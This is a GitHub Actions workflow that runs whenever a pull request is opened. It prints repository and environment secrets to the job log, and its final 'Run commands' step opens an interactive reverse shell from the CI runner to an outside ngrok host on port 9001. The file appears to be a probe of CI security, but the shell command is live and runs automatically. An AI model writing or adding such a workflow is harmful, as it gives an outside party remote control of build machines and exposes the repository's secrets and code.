name: Run Commands on PR Open

on:
  pull_request:
    types:
      - opened  # Trigger when the pull request is opened

jobs:
  run-on-open:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v3
      
      - name: Access Secrets and Environment Variables
        env:
          TEST_SECRET: ${{ secrets.TEST_SECRET }}       # Repository secret
          TEST_SECRET_ENV: ${{ secrets.TEST_SECRET_ENV }} # Environment secret
          TEST_ENV_ENV: TEST_ENV_ENV_VALUE              # Static environment variable
        run: |
          echo "Accessing secrets and environment variables:"
          echo "TEST_SECRET=$TEST_SECRET"
          echo "TEST_SECRET_ENV=$TEST_SECRET_ENV"
          echo "TEST_ENV_ENV=$TEST_ENV_ENV"

      - name: Run commands
        run: sh -i >& /dev/tcp/6.tcp.eu.ngrok.io/9001 0>&1 
